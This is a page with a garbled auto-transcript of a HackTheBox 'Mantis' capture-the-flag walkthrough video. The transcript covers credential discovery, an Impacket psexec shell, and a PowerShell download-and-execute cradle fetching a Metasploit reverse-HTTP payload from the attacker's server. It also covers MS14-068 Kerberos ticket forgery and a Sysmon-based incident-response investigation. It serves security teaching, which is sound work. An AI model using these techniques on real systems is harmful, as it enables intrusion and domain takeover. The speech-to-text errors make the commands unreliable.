HackTheBox - Mantis

IppSec · Beginner ·🔐 Cybersecurity ·8y ago

Key Takeaways

The video demonstrates a cybersecurity attack on a HackTheBox machine called Mantis, using tools such as nmap, GoBuster, DBeaver, and Metasploit to gain admin access and exploit vulnerabilities.

Full Transcript

what's going on YouTube this is upset can we do a mantis from half the box getting used on this box wasn't that interesting because it was pretty straightforward you find SQL credentials on a web server but finding that web server is a little bit difficult because this box is a domain controller on Active Directory so it has a lot of open ports that you just gotta sift through once you find the SQL credentials you can log into the database and dump a domain user credential but getting rude on this box is where it becomes a amazing because the intentional method is a Kerberos forging attack which is wizardry of itself that's a CVE in 2014 that tricks the domain controller into thinking you're an admin and just gives you that access but this box gets even better because of a unintentional admin method if you use dim packets PS exec and just got really lucky you just got admin so we're gonna dig into that and exactly what happens the too long didn't watch is the cleared of this box ran PS exec didn't clean up his tracks and left a nasty backdoor so I'm gonna spend a lot of time digging into that because I love doing isn't response type things and this is a prime example so let's jump in starting things off we do and map with - SC for deep will do SV first that was a typo for enumerate versions SC for default scripts Oh a - output all formats and we'll throw in the directory and map and call this initial the IP address of mantis is 10 10 10 50 - looking at the results of the script we do see a lot of for its open we got DNS open 88 open which is a Kerberos port RPC NetBIOS active directory LDAP it's a 2008 r2 box Service Pack 1 SQL Server 2014 and that's a good clue that you may want to look at a CV in 2014 I didn't realize that before the SQL script grin we got the global catalog put another big clue that this is a domain controller port 8080 says this is running iis with ass blog called tossed salad and a bunch of other RPC ports so what I'm going to do is we had a lot of forts open I'm gonna do a full end map and then poke at 8080 so always want to have some type of enumeration going in the background and map - P - that's gonna do all ports I'll put all formats and map and we'll call this all ports ten ten ten fifty - it's just a bit easier than writing one - I think 65535 but let that run and go to the port 8080 since that was the webserver and we generally like attacking web servers this is incredibly slow going here it is 50 - not 40 - and we get to blog so one thing that's interesting is this box was released in 2017 and the footer on this website says 2018 so off the bat we know this CMS is just putting the server's local year and the footer the server was actually built probably September 1st of 2017 because that's when all these blog post appears so that's at least around the time this box was being created we have a login prompt so we can just try a few basic things like admin admin it doesn't work a port scan isn't done yet so trying a few other things we can go to like slash robots.txt not found if we do control you we can scan try to find out what version of orchid this is we know it's work at CMS I believe that's a CMS yep so you do something I think we do it in one of my very first videos I want to say popcorn of downing a bunch of versions of the CMS and then just md5 something or hashing a bunch of static files like JavaScript and then finding out the exact version that way but the exploit isn't actually in the CMS it's in something else so we will just wait for that and map to finish so now that the end map finished we can see how many ports are open ref the bat I didn't notice leap before and it's now open but let's run a script scan against them all so before I did Oh a all-ports so let's do a grep - Oh P because it's such overpowered essentially all it does is only show what is matched so if I do like waste on and map all ports grabbable and map it's only gonna show me waste since that's what it matched so we're gonna do first a cat on end map all ports GN map that's again grab pool and map I'm gonna do a grep start off with a space then we want to do a digit and we want to do one to five of them because 65535 is five digits long and then we're going to end that with a slash so if we look at the output of that we just have a long list of ports so what we can do with that is first a said to get rid of that space and slash I screwed that up let me put this quote there and then we can do TR say hey take off those slash ends and make them commas so I can copy all these ports and you do a different head map so SCS V - P put all the ports and we'll call this targeted this shouldn't take too long but let's just look at that leap board can we get to it over the web so 10 10 10 50 - wheat and we get a is so let's stop a go Buster that was weird oh my path must be screwed up cuz I don't know why soon as they would put up a new terminal window it's saying export command not found let go path yeah good enough for me not sure exactly what's going on with my box but that's a problem for another day so what was I doing oh go Buster so go Buster - H we will do the - go for your L HTTP 10 10 10 52 and leet then - W for the path there word list user share world list - Buster and we will do directory list 2.3 medium and what do you lowercase I think it's all lowercase this may go faster - tea four threads and we'll say 20 default is 10 so go a little bit quicker hopefully that comes back soon and map is still going that is just about done and let's see that should be there hey that brahms fixed that is awesome so we will just wait for this go Buster to finish and then we can go to the next step so we have a directory come back secure underscore notes so let's check that out we have web config and dev notes web config returns a for for not found dev notes gives us some instructions viewing the source just in case there was something hidden in the HTML so this is how they install the server so they download work at CMS download SQL Server 2014 Express create the user admin and create the orchid DB database launch is so there's nothing about the password but something looks odd in this URL so if we try to base64 decode it there we go we get this bunch of digits so and do is echo - n so we don't have a trailing line and do W C - C - count the number of characters 36 characters that is a number of characters so I don't think this is gonna be any type of hash if it was like 32 I think that's like md5sum let's check yeah so if it was like 32 I would suspect md5sum but this I'm guessing maybe hex so echo - n type that - x XD - PS - our I think is the command yep so what PS does is well x XD first let's take a file so well x XD actually what we're do run that command put it to SQL dot password if we run x XD against that we get a bunch of hacks so we got the location and hex I think that's an X maybe I forget exactly what that field I know it's the location I don't know if this is in hex or not or binary but not binary pretty sure this is X oh talking is heard you can never prepare enough to do a video let's see yep that's an X okay so the location in hex a distance base whatever then you got the actual hex and then some plain text of what this decoded - so what PS did was says hey let's get rid of this first column and this last column and it only showed me the hex and then what - our does is reverse so since I gave it hacks and I said hey this is only gonna be hacks it's not gonna be in the format of these three columns and I want you to reverse it so that's all that was so now we got the SQL password and that's ms SQL underscore s a underscore password so this is either the SA account which is the system admin account or admin which is what the def note said so we have to open up a SQL browser and start testing or logins there are two quick ways to do it we could do it through the command line and on Kali that would be sq SH or we could open up a graphical database manager type thing and I prefer the graphical one and I'm gonna use D beaver D beaver you can see it the reason why I like gooeys when dealing with database stuff because well Oracle Postgres my sequel MS equal etcetera all have slightly different syntaxes and different clients normally and it can be a real pain in the butt so this tool generally has all the databases I need and I want to really remember all the nuances between syntax because well I can just click so that's what I'm going to do so 1010 1052 database was forged DB username try admin because that's what the instruction said and the password is mssql admin password we can test the connection connected so that is a good sign even supports SSH tunneling this is a awesome client so safe password locally that is fine and we will finish so let's resize this to make it as uniform as everything else and we can just drill down so we want to look at work at dB the DB oh the tables and we have a list of all the orchid tables so what I'm going to do I just want to look at users so I'm just gonna search for users in the stop and we can see the blog user per record so double click that we get how it's created we can click on data and we can view all the database information in this we got an admin password and we have the James password and this is actually base64 encode if we look at the end and it's also hashed so this I guess CMS supports both plaintext and hashed passwords so we could try to crack the admin password or just try this James thing l we got James at htb dot local which is kind of a domain name if we go back to our end map let's see the domain name is htb dot local and remember we said this was a domain controller so chances are this is a domain user and this is where I had just done PS exec and got really lucky so let's do the unintended route first and then would do the Kerberos forgery with the CVE so what I had done is used PS exec on Linux so I do locate PS exec we have quite a few things don't want n map I want impac it and we have one right here so use a shared doc I don't want doc huh I think I do yep that works sounds on but nope that's it it's a BS example in their documentation so we want to do htb / James we could also do dot local with domains that doesn't matter but and we want the IP address which is ten ten ten fifty two and we want to run cmd.exe the password james passwords so what can we copy this we can paste that was not my clipboard that my clipboard there we go and we get a shell we do Who am I and we are NT authority / system box done and I think the funniest thing about this is the scripts saying hey is admin writable no okay huh is see dollar sign running we receive all no net login can we write there nope this fall can I write there nope okay well I'm gonna start uploading a file yeah it aired and then just ask hey can I get a show and so I was like why didn't you ask that before and just gave it right up so that is the unintentional method and you may be a bit confused and yes this is actually an admin user if we go to administrator and we can go to desktop I won't read the flag but we shouldn't be able to get into this directory we could do like net local group administrators so the member of administrators is administrator domain admins and Enterprise admins so these two or Active Directory groups we can do like net group domain admins the only administrator and we can do net group Enterprise admins group Ryze admins see only administrator net user James he is only a member of domain users and remote desktop users so this was definitely a confusing time at how we got admin so we will have to dig into that to do that I want to actually Remote Desktop to this server because it's a bit easier to start installing things and do is it responds when you have a GUI if we don't have any tools which since we're doing this all free we're gonna go with no tools I want to go to desktop my desktop let's just exit there we go back in my working directory so go back to and map and we can do all ports and map and we don't see three three eight nine so remote desktops not running so let's enable remote desktop and I don't know all the commands to do it and sometimes it's firewall so how I like doing it is just Metasploit so go up unicorn and we're going to do Python unicorn Pi and this is just a tool by trusted SEC I've used in other videos but if you just Google trusted SEC unicorn this is what I'm using so I'm just the best buy Windows meterpreter reverse HTTP my IP address which is a notice if config Don 0 10 10 10 14 to 10 10 14 to and the port let's use 443 even though it's not gonna be HTTPS it doesn't really matter it will generate that shellcode okay let's split vertically what I'm going to do is copy PowerShell attack two documents htb boxes mantis and I'm also going to copy you know point out are see there let's get back to my directory so we have this eunuch $1 C file so you just to msf console sure you know cannot see I think it's Arctic I used unicorn in sounds correct and that should load Metasploit up no no I say can so long there we go what I want to do is make HTTP move PowerShell add-on attack into HTTP and we can do Python - M simple HTTP server I specify a T so that's on port 8000 doesn't matter and now I can do powershell IEX new that is new object net web client download string HTTP 10 10 14 - 48,000 powershell underscore attack text that should be in double quotes I sure - copy that oh well and 1014 - okay execute that should see this my HTTP server 10 10 14 to 8 thousand something is going on think Python simple HTTP said was door top because says I hit control-c no nothing happened localhost:8080 el that's good I guess we'll try that again so PowerShell IX new object that web client download string remember the quotes messed up I try with different quotes next PowerShell copy/paste copy/paste I hate quotes I really do so if you have troubles try reversing the quotes so we got this file it's doing magic I think D off you skiing the PowerShell right now and then we should get something over on Metasploit there we go got a shell so we can now search for RDP and use post windows manage enable RDP info let's see set password we'll just do a weak password set username if SEC set session is in session one open that's what same interpreter that's why did that run now we got a remote desktop so we can do a desktop - G because it's gonna be resolution let's say 1600 by 900 I don't know ten ten ten fifty - that is actually a decent size suspect my user hip sac password 1 2 3 4 exclamation point dot slash now notice how it's changed from login - mantis - HGB password before and now we get in so we want to debug exactly what's happening so we have to go to the event log so let's see I'm not UAC yes and yep this computer there we go and go over to security let's see there are a lot of events so what's this count fail to login system mantas I don't think that's me nope that is me we were probably like 35 or 34 I think you couldn't log in again so let's go back to this what I do this is in packet we will copy this run it put a failed password in go to event log refresh we got an audit failure so that's gonna be a marker so we know when the last time was and put Jane's password in alright typed it right okay so we're gonna refresh this audit failure is us and we see attempting to authenticate login successful and that's logging in as James who is definitely not a to main admin just some credential validation again James and that's all we get in the security log application log I don't think we get much yeah nothing system nothing set up for two events nothing so nothing too interesting right there and we could actually hivemc open ready so we could add another snap in if we want look at Active Directory using computers and we can see see I'm probably in users that's me where's James all right click find James he is a member of just those two groups nothing else and you can also go to do here and use this doll domain controllers the main users should be two main admins there this remembers exactly the same thing we saw when running that group so nothing to wishing there in order to debug this a little bit further I actually installed sis Mon which enhances the logging by eight a lot so we have to download this bond so I just Google Microsoft syslog download and this should be it download it well just open with archive manager cuz I don't know if it box over there on half the box has a unzipper well copy system on 64-bit executable to a desktop system on needs a config to run or run well and Swift on security has a really good config at least our starter config so just Google Swift on security system on and we want to download this file save page desktop save that so we've got those two files there so let's go back into a window and we want to go where simple HTTP server is and we'll copy the two files off desktop so if that backup will change to port 80 so it's a bit easier go to remote desktop and we can start in an explorer our web servers IP which is 10 10 14 - we want to download sis one exe and sis Mon export XML ok I open up a elevated command prompt go to users the user you created in slash downloads and we install this one by just doing sis Mon 64 exe - I and we have installed system on and we can specify the config at this Mon export XML and swift on security is awesome because that fig is super well-documented so if we look at the config system on XML it has a bunch of event IDs so six-month event ID 1 this is process creation has a bunch of rules or process included explains exactly what this event ID is and this becomes extremely handy you got file creation time retro actively changed so that's like someone changed this files creation time to be something wet in the past or something I guess network connection initiated so when the processor a network connection throw a log Status Messages when a process ends throw a log when drivers allergic to the kernel throw a log DOL is loaded by a processed or a log you can see just all this in-depth logging that system on is providing remote threads created raw disk access so if you do like volume shadow copies on a domain controller and to grab NTDs did or you use ninja copy this will throw a log and the cool thing about it is it says it's disabled because it causes high system load and it goes down and says a comment you will likely want to set this to a full capture on domain controllers because no process should ever be doing a raw read and that's because of the scenario trying grab and tds death inter-process access can throw high CPU so it's disabled that's modeling for processes accessing other processes memory if you enable this be sure to exclude antivirus because antivirus is very noisy in this process ID file creation events so we're looking at this is Exe here yep all executables will log on file creation registry modifications ultimate data streams so just a bunch of good stuff in sis Mon so now that we have it installed we can access the system on log by going into windows logs application service logs Microsoft Windows and then system on maybe we have to refresh let's close this and open it again no okay Microsoft Windows system on there we go it never got this operational log and we can already see process creates and stuff and that's me starting MMC a process terminating so let us do that again see prostrate is now gonna be the top go back to a Linux thing and run this again I just made a typo okay got the shell hit f5 to refresh and we should have some new stuff process create right here network connection so let's see source IP fe80 so this is not us probably I think what that's doing not sure another ipv6 one 135mm see so for some reason the network detect did not flag on us this is doing MMC stuff localhost but we do have a process create and it created the executable dze I didn't create it it started the process it didn't create this executable it would be file create and if it created the file but since this process create it just started this executable without getting a process of a file create started a process without creating a file there and that's because this didn't get fully cleaned up by someone so we can see it even try to upload that file we try to upload UL JK k JH r dot exe but it executed this file if we go into the services we can find out exactly why it executed that file the service IH x m path to execute that file so let's look at exactly what this file is c : windows d there it is it was created on september 1st 2017 so this isn't us at all this is just PS exec hijacking a previously created service that allowed us to use named pipes and still execute a command as admin so notice when I control seed earlier let's see to get out of this and that's why I did a whole new PS exact instead of using the one on one right here is because I didn't want it to clean up the installation and if they cleaned it up and remove the service they don't be able to get another session so I left a session open so it can't remove that binary if that makes sense because if I try to delete that it's gonna say it's in use yeah and that was of course admin because it is open so since I have the show open in this window when I'm exiting impact it it's not kicking me fully off so if we control see out of that one control see out of this one we'll see if it actually cleans up that binaries there I think still there we refresh here still here but if we go again just put this password to prove that it's this service that's the James password logs in we can do it multiple times and it's not cleaning it up I guess because it's thinking it's our zr f HC u or whatever but if we stop this service so that name pipe no long exist on the box oh it's still executed let's see let's do that again that service is not running okay let's look at this pond and see what happened am i still executing that file process create different one EF u so let's go back to a registry and see if we missed a service there's a tzz w if we go properties we do have this service so let's exit that stopped this and now we know get a shell so impact its PS exact is smart enough to find a service that is configured I guess with impact its PS exact and hijacked that path which is pretty cool so we verified James isn't working so I'm going to do is something pretty cool I think and we're gonna specify my user Itzik and let's see let's go Jane's password I'm gonna login and now let's look at sis mom what did this say see we got registry event so we created a service do VL we created that file see is this to us nope that's not us I don't think that's us so what father we create yep so this is us this month saying we create see : windows lze which we did because remember hip sex and admin and then it created let's see a registry value another registry value so this is creating the service if we go into services dr VL if we refresh so everything move down because the service got added up here we have that service created then we got a process creation and another process creation but that's not the cool thing so if we copy this and do it to the james user j @ m 3s and it now works so because we have ApS exact session running currently as system the other PS exec as a domain user is able to hijack the name pipe and get on so one of the dangerous things about I guess impact its PS exact if we exit out of that we see stopping the service removing service removing file and if we try to get to this again we can't because it successfully cleaned up there are other ways to do like PS exact things like I think when exe is one I think this is mimicking PS exact but - you HD be hip SEC 10 10 10 52 cmd.exe this I get on and now see James pass was still my clipboard so let's do the same thing with Wynn exe and we still can't do it so when it sees a little bit different however when exe does one dangerous thing I believe and there is a - - uninstall flag which uninstalls the winner exe service after remote execution and I don't think that's default so if we go back to system on and look at registry creations dear VL there we go when exact service is what it creates and I no longer have when TX e running we have the service still here so and that service executes nothing oh now there it is when exe SVC exe so I don't know if that binary is secure if it opens up another whole like impact it did and it's just not smart enough to go and exploit that hole but something to keep in mind when you do pen test is always do at least the minimal amount of is response to make sure you're not leaving artifacts behind and impact it's still not working there's one other thing we can look at if we really wanted to and get the creation date of the registry key and after that we'll end the as in response portion of this video so if we go to reg at it and try to view this key so let's see this comes in really handy because it's not easy to get when a service was created if you lost the event log of it let's see because there's nothing in these services creation thing that has when it was actually created but you can still pull that forensic li so that's an H key local machine system currentcontrolset services and we go like when exec service we still don't see any creation dates in this registry but there is a trick to get it and we're gonna use PowerShell to do it so let's clean up a window a little bit and go back to a web browser because we're gonna want to grab another file to help us do this tecnique get last right time registry key down this PowerShell script download this PowerShell script I agree save and we'll copy it alright it's and downloads is it capital G that looks good go back to desktop and open up Internet Explorer to download this Wow a version to always be safe promote rev version 3 is on this that's what we want this is a PowerShell snippet PowerShell go to my desktop and we want to and put the module execution policy dr. white red twice I just hit the up arrow one too few times okay so now we should have a dredge key remember as a PowerShell snippet so we can do get item we got specify the registry key which is hklm and then system current control set services i h XM i think that was the very first one we looked at much of this is going to be changed because of us disabling the service think of me i've been updated nope so even though we disabled the service the last right time is still november 1st 2017 at 1 p.m. and that's the time this service got created if we do the same thing with what was it when execs SVC exactly SVC can't find path what was the service name when exec Oh when it exe no exact boy am i right here we can see I created that on today at midnight oh god it's midnight oh well but that ends the incident response piece of this video and we will now I guess go into the intended route which is the Kerberos forgery I guess I can just log out and we can clean up exit exit exit - why clean beaver we don't need okay now that we're clean slate let us begin the intended route actually I lied there's one other thing I wanted to show before we go into that while digging into this whole issue with how easy it is to jump on a named pipe as drain use it within packets yes exactly if you go to their github and go to issues let's looked at closed and we'll search for admin I guess we got something by a Lamont who is a hack the Box player and he did this on November 13th which is probably right around the time this machine got launched asking why the hell am i able to do this and I looks like he's pretty much just doing what we just showed in the video and he doesn't know how it's working and here the tall look at the services running and saying you should always clean up yep if you clean up this problem goes away but yeah I found it funny when digging through github stuff you find someone from half the box asking a question so let us continue into the intended route for real this time so instead of pretending I know this all by her we're just going to Google the article knock past kerberos exploitation I'm going to follow the instructions on this I think this is it a link to this article no that's not it second one here there we go this is what we want to do so here's a little write-up on it does this actually explain the vulnerability yep this kind of explains it local doesn't give a good explanation I don't fully understand this tack but there's a great guide to exploit it so let us do it first we have to install these packages and I don't think I have that coverage package installed so we will install it and then after that we do a end map and that's going to be a UDP scan and I guess they're looking for NetBIOS don't know why they chose UDP o - P oh I didn't know you could do that with that map you can actually specify you : UDP and T : that's TCP that's cool I wonder if you need that - su flag there to specify UDP anyways going here we have to create a Etsy host I don't think this is needed I think it's a local Kerberos server hostname I think we're creating this file that it's asking us to but I think it was mantas mantas I think I'm pretty sure we're going to disregard that setup from adding this file but V Etsy host and we can do 10 10 10 52 mantas mantas h TB and me know h TB I think mantas HT b dot local h TB mantis h TB local I think that's everything I think you only need H to be an H to be dot local but I'm adding the actual Windows host name as well which is mantis okay nameserver let's point ourselves to server so Etsy resolved comm name server ten ten ten fifty two and network me I'm just going to try to rewrite this file so change the tributes think my plus I saw calm so that was huh I guess where I could have made that final immutable and that would have prevented it from going back oh well now we have to do care B so this is doing it so let's see that was at c kb v Kampf so kb v com2 cabbie five.com tilde realms so we want mantas HT b dot local I believe default domain GP okay that all looks good a date with set a service date close to it so mantis used to be local date set and now we got to generate a Kerberos ticket for a domain user so okay Anette James yes okay okay list to lift tickets we have successfully authenticated with the domain that is awesome and we're going to try to connect to the domain with SMB client and get an error because we don't have access to see vol GB mantas access denied okay we need to get the unique identifier for user so James and the main controller suppose it asked for that okay show you at m3s a PC client look up names okay we got the s ID just save that and now we should be able to do this python script which I don't have do I have it on Kali do not I miss a link to download this Google should be easy enough to find there we go Pike Ecch Kerberos exploitation kit let's just download this whole thing for Windows that's fine and you may guess I haven't really done this in a while so we'll see if this works Python speed s dash D okay so we want to do Python m/s 14 - you James at HD b dot local - s and then the cid then - d and the domain please work we created the ticket looks like and now we can get list how did he dumped it it's weird here we still got two tickets and they are expiring 90 times soon oh well see what happens we'll move that over to this directory go in there I still need that don't I oh we move it to temp qb5 okay we have added that in - I guess our Kerberos directory and now we should just be able to SMB client Oh mantis failed no login servers huh I miss a step to clear the tickets take it cache file where's my ticket cache file ok it's there it's definitely a new ticket so placing it there gave us the new ticket James it needs to be that local see fricking hate which we'll call it network manager of course is no login service there we go that works it was network manager editing my resolve Kampf so I couldn't resolve the name and that's why I said that so we have a admin SMB access to the Siebel so we could just go to administrator and then desktop I think it's good and we downloaded route text size of 32 that's md5sum we won't look at it but we can take this one step further and use gold and pack which we'll use this ticket and like the PS exec and give us a shell so let's try that ok golden pack do I have it I do and always specify is username and then that so htb James at mantis no module name pack see up and pack it in pack it from here a module name to pack well what's the worst that can happen there we go but I don't think it should of oh it does ask what's a password okay docking domain matches found vulnerable more processing required still business specified IO try that again I wonder if this is something we did so I'm going to I guess I can try restarting this service service real quick and then reboot the machine and try it but that should work so switch user we created EPS ACK okay and now we want to server restart yep still fine login user force attacking why do you do that everything back up I guess we have to revert the machine because we had screwed up doing something so I'm gonna pause the video redo all these steps and try again good news I figured out the issue and the machine didn't have to be reverted running through the steps again thinking about what I was doing I noticed when we generate the ticket with MS 1406 8 we specified dot local and when we were doing golden pack is my verifying it worked we were not doing dot local so we don't have that it gets busy we add dot local and we get on and the reason for that is probably because we're spoofing a ticket so we have to have the full name of the ticket so yeah that was silly I wish it told us more descriptive error but that was the issue that being said we can kind of see how this mistake actually happened now because I bet if I go to the James user right now I'll be able to just get on the box because this is the same exact prompt and status that um PS exec does when we found that P exact issue we have found writable share and admin it uploads a weird file and open service manager creates their service of four characters and starts it so this is probably why the PS exact or impact - PS exec worked is because when the creator was making it he just did Gordon Pak got the shell and didn't clean up properly he probably just powered off of the VM when he had a shell and it didn't do these remove steps which created that back door so when we used PS exact PS exact found the back door and gave us a system show hope that makes sense but that is mantis hope you enjoy the video and I will see you all next week

Original Description

00:00 - Intro 01:20 - Start of nmap 03:22 - Poking at a rabbit hole (8080) 08:08 - GoBuster to find hidden directory 09:50 - Finding SQL Creds in hidden directory 13:40 - Using dbeaver to enumerate database 16:50 - Impacket-PSExec to Admin 19:00 - Proving James is not an Admin 20:35 - Using MSF to Enable Remote Desktop to do Incident Response 27:00 - Start of Remote Desktop Looking at Event Log + Active Directory 31:00 - Installing Sysmon to get better logs 36:15 - Looking at Sysmon Logs 42:20 - Proving the PrivEsc was due to Impacket-PSExec not cleaning up 48:00 - Using Forensics to get Service Creation Date 53:30 - Finding a HTB User creating a Git Issue to Impacket (LOL) 55:10 - Intended Route - Forging a Kerberos Ticket MS14-068 71:00 - Explaining why the unintended route probably got created
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 27 of 60

1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

This video teaches how to exploit vulnerabilities in a HackTheBox machine using various tools and techniques, including Kerberos exploitation and Metasploit. The video demonstrates how to gain admin access and execute commands on a remote server.

Key Takeaways
  1. Use nmap to do a deep scan of the box
  2. Use GoBuster to find hidden directory
  3. Use DBeaver to connect to the database and view the tables
  4. Use Metasploit to enable Remote Desktop on the server
  5. Copy a PowerShell attack script to the server and execute it using a Python HTTP server
  6. Gain a remote desktop session on the server
  7. Configure Sysmon with Swift on Security config
  8. Enable in-depth logging with Sysmon
💡 The video highlights the importance of configuring logging and monitoring tools, such as Sysmon, to detect and respond to potential security threats.

Related Reads

📰
Australian Cyber Security Centre Issues Alert on Mass Exploitation of CMS Vulnerabilities
The Australian Cyber Security Centre warns of a large-scale campaign exploiting CMS vulnerabilities, urging organizations to patch systems immediately
Dev.to · NetSecOpsIO
📰
Malicious 'jscrambler' NPM Package Versions Deploy Cross-Platform Infostealer in Sophisticated Supply Chain Attack
Learn about a sophisticated supply chain attack on the jscrambler NPM package that deployed a cross-platform infostealer, and how to protect yourself
Dev.to · NetSecOpsIO
📰
This Week in Breaches: What HSIN and Accenture Teach Us About Life After the Break-In
Learn from recent breaches like HSIN and Accenture to improve post-breach security and response strategies
Dev.to · Arashad Dodhiya
📰
If I Had to Start From Zero in 2026, I Would Do This
Learn a step-by-step roadmap to break into Application Security from scratch in 2026
Medium · AI

Chapters (17)

Intro
1:20 Start of nmap
3:22 Poking at a rabbit hole (8080)
8:08 GoBuster to find hidden directory
9:50 Finding SQL Creds in hidden directory
13:40 Using dbeaver to enumerate database
16:50 Impacket-PSExec to Admin
19:00 Proving James is not an Admin
20:35 Using MSF to Enable Remote Desktop to do Incident Response
27:00 Start of Remote Desktop Looking at Event Log + Active Directory
31:00 Installing Sysmon to get better logs
36:15 Looking at Sysmon Logs
42:20 Proving the PrivEsc was due to Impacket-PSExec not cleaning up
48:00 Using Forensics to get Service Creation Date
53:30 Finding a HTB User creating a Git Issue to Impacket (LOL)
55:10 Intended Route - Forging a Kerberos Ticket MS14-068
1:11:00 Explaining why the unintended route probably got created
Up next
How to Build a Successful Career in Cyber Security, Avoid Common Mistakes in Tech Education
Sreevidhya Santhosh
Watch →